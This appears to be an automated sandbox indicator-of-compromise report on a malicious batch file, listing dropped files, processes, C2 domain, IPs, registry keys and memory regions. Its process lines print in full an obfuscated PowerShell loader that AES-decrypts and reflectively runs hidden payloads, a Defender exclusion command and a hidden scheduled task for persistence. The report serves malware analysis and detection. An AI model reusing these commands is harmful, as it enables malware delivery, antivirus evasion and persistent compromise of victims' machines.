IOC Report
UrgenteNotificationRef.cmd

loading gif

Files

File Path
Type
Category
Malicious
UrgenteNotificationRef.cmd
DOS batch file, ASCII text, with very long lines (65234), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\Network28681Man.cmd
DOS batch file, ASCII text, with very long lines (65234), with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\brotha\logs.dat
data
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13p1nkrg.ewu.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1xkfqpf4.yeg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4cpvlso0.ipm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4g3x5wsv.q01.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_as1kdyay.rex.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_askv2kvu.13g.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_baom3epz.c4o.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bpjd2ra5.vof.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brn1hkd0.oir.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw5o2t4g.e44.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cd1d5j4k.kqr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cqudatba.j4u.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dnzx2egj.qe2.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dzxghbwl.yle.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejl10khe.wyc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_enz55n5n.wki.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5z0cuan.lkd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fjmqb3xd.ldc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm43tpua.5q2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3xukf0c.k30.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lx3oq5lv.nxe.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m013anwn.rce.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mfzgq3xq.pkm.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_otfm0f0t.5t2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxazfxu5.iw3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rxxatjss.dal.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_skocjqiw.uol.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5xxq3se.aq1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlye33uu.dlt.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wzovngix.50i.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrfeu22c.zls.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ytjbolok.r05.ps1
ASCII text, with no line terminators
dropped
\Device\ConDrv
ASCII text, with very long lines (2142), with CRLF line terminators
dropped
There are 30 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\UrgenteNotificationRef.cmd" "
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\UrgenteNotificationRef')
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\System32\cmd.exe
C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Network28681Man.cmd"
malicious
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Network28681Man.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\Network28681Man')
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 28681' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Network28681Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 18 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://geoplugin.net/json.gp
178.237.33.50
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://nuget.org/NuGet.exe
unknown
https://aka.ms/winsvr-2022-pshelp
unknown
http://crl.m
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
https://aka.ms/pscore6lB
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://github.com/Pester/Pester
unknown
http://crl.microsoft0
unknown
There are 6 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
embargogo237.duckdns.org
45.74.19.121
malicious
geoplugin.net
178.237.33.50

IPs

IP
Domain
Country
Malicious
45.74.19.121
embargogo237.duckdns.org
United States
malicious
178.237.33.50
geoplugin.net
Netherlands

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-K9847Q
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-K9847Q
licence
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-K9847Q
time
malicious

Memdumps

Base Address
Regiontype
Protect
Malicious
590000
heap
page read and write
7BDF000
stack
page read and write
2FAC000
heap
page read and write
6A30000
heap
page execute and read and write
6FFB000
stack
page read and write
6EEE000
stack
page read and write
68FE000
stack
page read and write
6FA0000
trusted library allocation
page read and write
6EAE000
stack
page read and write
6C1E000
stack
page read and write
559F000
trusted library allocation
page read and write
7010000
trusted library allocation
page read and write
69E0000
trusted library allocation
page read and write
359E000
stack
page read and write
4D25000
heap
page execute and read and write
8360000
heap
page read and write
6E60000
heap
page execute and read and write
99E000
stack
page read and write
7D5E000
heap
page read and write
3105000
heap
page read and write
890C000
stack
page read and write
547C000
trusted library allocation
page read and write
773000
heap
page read and write
8430000
trusted library allocation
page execute and read and write
7297000
heap
page read and write
7250000
trusted library allocation
page read and write
85EC000
heap
page read and write
704F000
stack
page read and write
C94000
heap
page read and write
4937000
trusted library allocation
page read and write
900000
trusted library allocation
page read and write
7B3B000
trusted library allocation
page read and write
6EB0000
heap
page execute and read and write
77D0000
trusted library allocation
page read and write
64A000
heap
page read and write
6DF3000
heap
page read and write
7970000
trusted library allocation
page execute and read and write
79C000
stack
page read and write
74D3000
trusted library allocation
page read and write
7465000
heap
page read and write
703E000
stack
page read and write
72FE000
stack
page read and write
48E0000
heap
page readonly
721000
heap
page read and write
7BEA000
trusted library allocation
page read and write
4754000
heap
page read and write
355E000
stack
page read and write
8C0000
heap
page readonly
5A2E000
trusted library allocation
page read and write
A50000
heap
page read and write
7DB4000
heap
page read and write
7100000
trusted library allocation
page read and write
756F000
stack
page read and write
620000
heap
page read and write
884E000
stack
page read and write
7FD000
unkown
page read and write
82A0000
heap
page read and write
744B000
heap
page read and write
8000000
heap
page read and write
B05000
heap
page read and write
886E000
trusted library allocation
page read and write
F10000
trusted library allocation
page read and write
811E000
stack
page read and write
8810000
trusted library allocation
page read and write
BD0000
heap
page read and write
70CA000
stack
page read and write
4F73000
trusted library allocation
page read and write
7040000
trusted library allocation
page read and write
6E60000
heap
page execute and read and write
6B1E000
stack
page read and write
6E3D000
stack
page read and write
82F4000
heap
page read and write
32F4000
trusted library allocation
page read and write
7B0D000
heap
page read and write
4990000
trusted library allocation
page execute and read and write
82E9000
stack
page read and write
489C000
stack
page read and write
491D000
trusted library allocation
page read and write
4820000
trusted library allocation
page read and write
70DD000
stack
page read and write
76FD000
heap
page read and write
72B7000
heap
page read and write
8841000
trusted library allocation
page read and write
72EE000
stack
page read and write
8030000
trusted library allocation
page read and write
4FE4000
trusted library allocation
page read and write
33D0000
heap
page read and write
5AC3000
trusted library allocation
page read and write
C65000
heap
page read and write
769E000
stack
page read and write
714E000
stack
page read and write
F35000
heap
page read and write
85B0000
trusted library allocation
page read and write
8624000
heap
page read and write
49CE000
trusted library allocation
page read and write
920000
heap
page read and write
5579000
trusted library allocation
page read and write
6A30000
trusted library allocation
page read and write
48F0000
heap
page read and write
7F268000
trusted library allocation
page execute and read and write
574E000
trusted library allocation
page read and write
832E000
stack
page read and write
7340000
trusted library allocation
page read and write
59C9000
trusted library allocation
page read and write
8F0000
heap
page read and write
7990000
trusted library allocation
page read and write
5551000
trusted library allocation
page read and write
87E000
stack
page read and write
8327000
heap
page read and write
512C000
trusted library allocation
page read and write
4605000
trusted library allocation
page execute and read and write
3640000
trusted library allocation
page read and write
704D000
heap
page read and write
6ADA000
stack
page read and write
6A5000
heap
page read and write
4D1B000
trusted library allocation
page read and write
8800000
trusted library allocation
page execute and read and write
7FDE000
stack
page read and write
7070000
trusted library allocation
page read and write
4CCC000
stack
page read and write
5DB8000
trusted library allocation
page read and write
4860000
heap
page execute and read and write
7370000
trusted library allocation
page read and write
323D000
stack
page read and write
3499000
heap
page read and write
7EC0000
trusted library allocation
page read and write
739E000
stack
page read and write
5559000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
3109000
heap
page read and write
EF0000
heap
page read and write
3380000
heap
page read and write
5ACB000
trusted library allocation
page read and write
80D0000
trusted library allocation
page read and write
83C8000
heap
page read and write
7D90000
heap
page read and write
3650000
heap
page readonly
6FF5000
heap
page read and write
A40000
heap
page read and write
556D000
trusted library allocation
page read and write
7022000
heap
page read and write
71B0000
trusted library allocation
page read and write
735F000
heap
page read and write
8BF000
stack
page read and write
328F000
stack
page read and write
7160000
trusted library allocation
page read and write
3300000
heap
page read and write
ED0000
trusted library allocation
page read and write
AEE000
unkown
page read and write
7054000
heap
page read and write
5570000
trusted library allocation
page read and write
7725000
heap
page read and write
EFE000
stack
page read and write
8270000
heap
page read and write
8241000
heap
page read and write
72AE000
stack
page read and write
53BE000
stack
page read and write
828C000
heap
page read and write
7FB0000
trusted library allocation
page execute and read and write
8C0000
heap
page read and write
1F7000
stack
page read and write
56B0000
trusted library allocation
page read and write
6C8E000
stack
page read and write
7330000
heap
page read and write
6A9D000
stack
page read and write
E70000
heap
page read and write
844B000
trusted library allocation
page read and write
7E20000
trusted library allocation
page execute and read and write
839000
heap
page read and write
4D1F000
trusted library allocation
page read and write
4C4E000
stack
page read and write
8B0000
trusted library allocation
page read and write
91E000
stack
page read and write
490C000
trusted library allocation
page read and write
7C97000
trusted library allocation
page read and write
70CE000
stack
page read and write
8764000
heap
page read and write
3627000
trusted library allocation
page execute and read and write
4BF7000
trusted library allocation
page read and write
80BE000
stack
page read and write
7630000
trusted library allocation
page read and write
EF5000
trusted library allocation
page execute and read and write
767E000
stack
page read and write
7BB0000
trusted library allocation
page read and write
6F5E000
stack
page read and write
86D000
trusted library allocation
page execute and read and write
6F4E000
stack
page read and write
6DFE000
stack
page read and write
7F7C0000
trusted library allocation
page execute and read and write
535000
heap
page read and write
E10000
trusted library allocation
page execute and read and write
4965000
trusted library allocation
page read and write
718B000
stack
page read and write
45F0000
trusted library allocation
page read and write
45AA000
trusted library allocation
page read and write
58E000
stack
page read and write
EEF000
stack
page read and write
6F9E000
stack
page read and write
72A8000
heap
page read and write
48F0000
trusted library allocation
page read and write
EE9000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
ECD000
trusted library allocation
page execute and read and write
700D000
stack
page read and write
747B000
stack
page read and write
46D7000
heap
page read and write
6FBA000
stack
page read and write
8180000
trusted library allocation
page execute and read and write
F30000
heap
page read and write
5709000
trusted library allocation
page read and write
EC0000
trusted library allocation
page read and write
6DAE000
stack
page read and write
7C98000
heap
page read and write
6DF000
heap
page read and write
C1E000
heap
page read and write
735E000
stack
page read and write
822E000
stack
page read and write
73CF000
heap
page read and write
76AF000
trusted library allocation
page read and write
367B000
heap
page read and write
47C000
stack
page read and write
B47000
stack
page read and write
6491000
trusted library allocation
page read and write
7D10000
trusted library allocation
page read and write
71F0000
trusted library allocation
page read and write
3507000
heap
page read and write
5565000
trusted library allocation
page read and write
5E33000
trusted library allocation
page read and write
687B000
stack
page read and write
7D8C000
heap
page read and write
7CA0000
heap
page read and write
7B2C000
heap
page read and write
293D000
stack
page read and write
7CE0000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
796D000
stack
page read and write
3620000
trusted library allocation
page read and write
7B9D000
stack
page read and write
4FD0000
heap
page read and write
EC3000
trusted library allocation
page execute and read and write
45D4000
trusted library allocation
page read and write
497F000
trusted library allocation
page read and write
4F3D000
trusted library allocation
page read and write
4D34000
trusted library allocation
page read and write
596E000
trusted library allocation
page read and write
6D6E000
stack
page read and write
81CA000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
A9E000
heap
page read and write
5DC2000
trusted library allocation
page read and write
80E0000
heap
page read and write
7DA4000
heap
page read and write
7210000
trusted library allocation
page read and write
78AE000
stack
page read and write
30C5000
heap
page read and write
6DBE000
stack
page read and write
79D0000
trusted library allocation
page read and write
83F0000
trusted library allocation
page execute and read and write
73C2000
heap
page read and write
CD3000
heap
page read and write
7BE000
unkown
page read and write
8635000
heap
page read and write
950000
heap
page read and write
E60000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
492F000
stack
page read and write
630000
heap
page read and write
8CB7000
heap
page read and write
7B30000
trusted library allocation
page read and write
6D1B000
stack
page read and write
69CB000
stack
page read and write
6F8D000
stack
page read and write
48EE000
stack
page read and write
814D000
stack
page read and write
970000
heap
page read and write
7E6C000
heap
page read and write
7600000
trusted library allocation
page execute and read and write
7E70000
trusted library allocation
page read and write
4EDA000
trusted library allocation
page read and write
45FA000
trusted library allocation
page execute and read and write
8664000
heap
page read and write
4A5C000
trusted library allocation
page read and write
29F0000
heap
page read and write
34A5000
heap
page read and write
E80000
trusted library allocation
page read and write
89FB000
heap
page read and write
73DF000
heap
page read and write
6F80000
trusted library allocation
page read and write
4501000
trusted library allocation
page read and write
9E0000
heap
page read and write
34F0000
heap
page read and write
8420000
heap
page read and write
CDB000
heap
page read and write
705E000
stack
page read and write
7E80000
trusted library allocation
page read and write
4B74000
trusted library allocation
page read and write
803D000
stack
page read and write
830B000
heap
page read and write
7D60000
trusted library allocation
page execute and read and write
7E10000
trusted library allocation
page read and write
2FC1000
heap
page read and write
858E000
stack
page read and write
5357000
trusted library allocation
page read and write
87CD000
stack
page read and write
4D0C000
stack
page read and write
6EFE000
stack
page read and write
4901000
trusted library allocation
page read and write
80DA000
trusted library allocation
page read and write
8170000
trusted library allocation
page read and write
758E000
stack
page read and write
86C3000
heap
page read and write
EFA000
trusted library allocation
page execute and read and write
7705000
heap
page read and write
6D60000
heap
page execute and read and write
7130000
trusted library allocation
page read and write
71E000
heap
page read and write
871A000
heap
page read and write
73B5000
heap
page read and write
35F0000
heap
page read and write
7B80000
heap
page execute and read and write
4602000
trusted library allocation
page read and write
4F60000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
880B000
stack
page read and write
80B0000
heap
page read and write
870000
trusted library allocation
page read and write
7C7D000
trusted library allocation
page read and write
7C9A000
trusted library allocation
page read and write
4B80000
trusted library allocation
page read and write
4FBE000
stack
page read and write
6D0E000
stack
page read and write
7C1E000
stack
page read and write
7A10000
trusted library allocation
page read and write
4F75000
trusted library allocation
page read and write
7190000
trusted library allocation
page read and write
72C0000
trusted library allocation
page execute and read and write
7400000
trusted library allocation
page read and write
940000
heap
page read and write
2FA4000
heap
page read and write
8210000
trusted library allocation
page read and write
7860000
heap
page execute and read and write
7350000
trusted library allocation
page read and write
4DD6000
trusted library allocation
page read and write
975000
heap
page read and write
70E0000
trusted library allocation
page execute and read and write
80B0000
heap
page read and write
720E000
stack
page read and write
7670000
trusted library allocation
page read and write
852E000
stack
page read and write
888F000
stack
page read and write
72BF000
stack
page read and write
839D000
heap
page read and write
7AD0000
heap
page read and write
F30000
trusted library allocation
page read and write
71E0000
trusted library allocation
page execute and read and write
3425000
heap
page read and write
710E000
stack
page read and write
7850000
trusted library allocation
page read and write
84EE000
stack
page read and write
7460000
trusted library allocation
page read and write
F30000
trusted library allocation
page execute and read and write
7680000
trusted library allocation
page read and write
80DD000
trusted library allocation
page read and write
35F4000
trusted library allocation
page read and write
4E95000
trusted library allocation
page read and write
7C70000
trusted library allocation
page read and write
4B95000
trusted library allocation
page read and write
69D0000
heap
page execute and read and write
4D2F000
trusted library allocation
page read and write
4CB0000
trusted library allocation
page read and write
80DB000
trusted library allocation
page read and write
59E9000
trusted library allocation
page read and write
74EE000
stack
page read and write
69FC000
stack
page read and write
72DB000
stack
page read and write
7CCD000
stack
page read and write
710E000
stack
page read and write
81E8000
heap
page read and write
4643000
trusted library allocation
page read and write
838B000
heap
page read and write
81EC000
heap
page read and write
8850000
heap
page read and write
879000
trusted library allocation
page read and write
F30000
trusted library allocation
page execute and read and write
3290000
heap
page read and write
3462000
trusted library allocation
page read and write
945000
heap
page read and write
7C40000
trusted library allocation
page read and write
637000
stack
page read and write
55E7000
trusted library allocation
page read and write
775A000
stack
page read and write
AAE000
unkown
page read and write
6E7000
heap
page read and write
6DF7000
heap
page read and write
3609000
trusted library allocation
page read and write
3472000
heap
page read and write
7630000
trusted library allocation
page read and write
3670000
heap
page read and write
542C000
trusted library allocation
page read and write
473E000
stack
page read and write
6E83000
heap
page read and write
5DC9000
trusted library allocation
page read and write
5D41000
trusted library allocation
page read and write
488E000
stack
page read and write
7D00000
trusted library allocation
page read and write
7FA0000
heap
page read and write
72A0000
trusted library allocation
page read and write
51CB000
trusted library allocation
page read and write
485C000
stack
page read and write
4D41000
trusted library allocation
page read and write
6FC0000
heap
page read and write
3460000
trusted library allocation
page read and write
7B20000
heap
page read and write
8C9000
stack
page read and write
8690000
trusted library allocation
page read and write
7CA0000
trusted library allocation
page read and write
798E000
stack
page read and write
546E000
stack
page read and write
6FD0000
heap
page execute and read and write
59E9000
trusted library allocation
page read and write
AE8000
heap
page read and write
4CBD000
trusted library allocation
page read and write
7BA0000
trusted library allocation
page execute and read and write
701E000
stack
page read and write
7F2D8000
trusted library allocation
page execute and read and write
6D98000
heap
page read and write
7D20000
trusted library allocation
page read and write
7020000
trusted library allocation
page execute and read and write
446C000
stack
page read and write
86D0000
trusted library allocation
page execute and read and write
8271000
trusted library allocation
page read and write
5134000
trusted library allocation
page read and write
7626000
trusted library allocation
page read and write
880D000
stack
page read and write
702E000
heap
page read and write
6DD1000
heap
page read and write
